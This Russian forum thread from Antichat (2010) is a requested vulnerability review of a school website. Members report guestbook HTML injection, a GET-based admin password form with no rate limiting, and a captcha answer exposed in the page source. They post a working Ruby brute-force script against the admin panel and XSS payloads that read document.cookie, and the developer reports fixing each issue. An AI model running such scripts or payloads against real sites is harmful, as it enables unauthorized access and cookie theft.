HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
Перезагрузить страницу Официальный сайт МОУСОШ п. Мичуринский
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Официальный сайт МОУСОШ п. Мичуринский
  #1  
Старый 29.03.2010, 20:08
Кровавый
Новичок
Регистрация: 11.03.2010
Сообщений: 20
С нами: 8510329

Репутация: 0
По умолчанию Официальный сайт МОУСОШ п. Мичуринский
Я сейчас разрабатываю сайт школы МОУСОШ п.Мичуринский.
Временный домен: http://schoolmich.edu.ru.orange.intobservatory.ru/
Работает на самописном движке (если это можно назвать движком).
Прошу проверить сайт на уязвимости.
Интересующие области: гостевая, админ-панель (http://schoolmich.edu.ru.orange.intobservatory.ru/admin/).

Спасибо!
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 02.04.2010, 04:59
Kamik
Флудер
Регистрация: 02.12.2008
Сообщений: 4,294,967,295
С нами: 9179218

Репутация: 155


По умолчанию
Проверка все еще идет так что по пути буду редактировать сообщение.

1. в гостевой книге в поле текст сообщения можно вставлять html код
 
Ответить с цитированием

  #3  
Старый 02.04.2010, 06:14
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
С нами: 8674045

Репутация: 214


По умолчанию
1.почему в админке не надо вводить логин - сразу минус
2.почему в админке пароль вводиться формой с методом GET - гигантский минус
какой-нить тип пробуртфорсит пароль и выложит где-нить ссылку и гугл проиндексирует админку, а может гугл и сам сможет подобрать пароль
3.почему нет ограничений на кол-ва ввода пароля, хотя бы какую-нить куку с попытками вводил или поля с рандомными именами.

и как следствие всего вышеупомянутого, многопоточный брутфорс под твою админку выглядит как HelloWorld!:
Код:
#!/usr/bin/ruby
require 'net/http'
th_count=50
for i in 0..100000 do
	while Thread.list.size>th_count do sleep(1) end
	Thread.new do
		http=Net::HTTP.new('schoolmich.edu.ru.orange.intobservatory.ru', 80)
		pass=i.to_s(36)
		path="/admin/admin.php?password=#{pass}&doGo=%C2%EE%E9%F2%E8"
		resp, data = http.get(path)
		if !(data.include?("<body bgcolor=\"red\">")) 
			puts "#{pass} SUCCESS"
			exit 
		end
		puts "#{pass} FAILED"
	end
end
 
Ответить с цитированием

  #4  
Старый 02.04.2010, 06:33
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
С нами: 8674045

Репутация: 214


По умолчанию
прошел по такой ссылке
Цитата:
http://schoolmich.edu.ru.orange.intobservatory.ru/guest/showtopic.php?topic=430000000
заполнил форму и увидел это:
 
Ответить с цитированием

  #5  
Старый 02.04.2010, 06:47
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
С нами: 8674045

Репутация: 214


По умолчанию
у тебя в самом коде страницы гостевой зашит ответ на капчу

Цитата:
...
document.add.text.value = b;
}

</script>

<form name="add" action='add.php?topic=100&test=43' method=post>
<table border=2 width=627 height=441 bgcolor=#9CBB8A>
<tr>
...
капча была:
Цитата:
Выполните действие: 24 + 19
 
Ответить с цитированием

  #6  
Старый 02.04.2010, 16:16
Кровавый
Новичок
Регистрация: 11.03.2010
Сообщений: 20
С нами: 8510329

Репутация: 0
По умолчанию
Ссори, что не ответил сразу. Был немного занят.
Итак:
1. Убрал всякие iframe, img и прочую ересь из поля text.
2. Страницу, с несуществующей темой вы больше не увидите.
3. В скрипте, отвечающем за добавление поста вы тоже больше не увидите раскрытия путей.
4. Над капчей поработал. Придётся посчитать немного, прежде чем её вытащить. Думаю куки ставить бесполезно, всё равно прочитаете.
5. Над админкой сейчас работаю.
 
Ответить с цитированием

  #7  
Старый 08.04.2010, 23:27
Red_EYEs
Познающий
Регистрация: 07.08.2009
Сообщений: 36
С нами: 8822446

Репутация: 34
По умолчанию
http://schoolmich.edu.ru.orange.intobservatory.ru/guest/add.php?topic='%3C/script%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E Пассивка
 
Ответить с цитированием

  #8  
Старый 10.04.2010, 23:10
Кровавый
Новичок
Регистрация: 11.03.2010
Сообщений: 20
С нами: 8510329

Репутация: 0
По умолчанию
Цитата:
Сообщение от Red_EYEs  
http://schoolmich.edu.ru.orange.intobservatory.ru/guest/add.php?topic='%3C/script%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E Пассивка
Спасибо. Исправлено.
 
Ответить с цитированием

  #9  
Старый 16.04.2010, 09:08
Agel Nash
Новичок
Регистрация: 23.07.2009
Сообщений: 5
С нами: 8843352

Репутация: 3
По умолчанию
Гостевая. В поле "Сайт" пишм
Код:
http://ya.ru onmouseover=alert(document.cookie)
и получаем кукисы:-)
 
Ответить с цитированием

  #10  
Старый 18.04.2010, 00:16
Кровавый
Новичок
Регистрация: 11.03.2010
Сообщений: 20
С нами: 8510329

Репутация: 0
По умолчанию
Цитата:
Сообщение от Agel Nash  
Гостевая. В поле "Сайт" пишм
Код:
http://ya.ru onmouseover=alert(document.cookie)
и получаем кукисы:-)
Вроде исправил. Со второго раза.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Официальный сайт Московского метрополитена затроянили root_sashok Болталка 6 16.01.2010 14:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.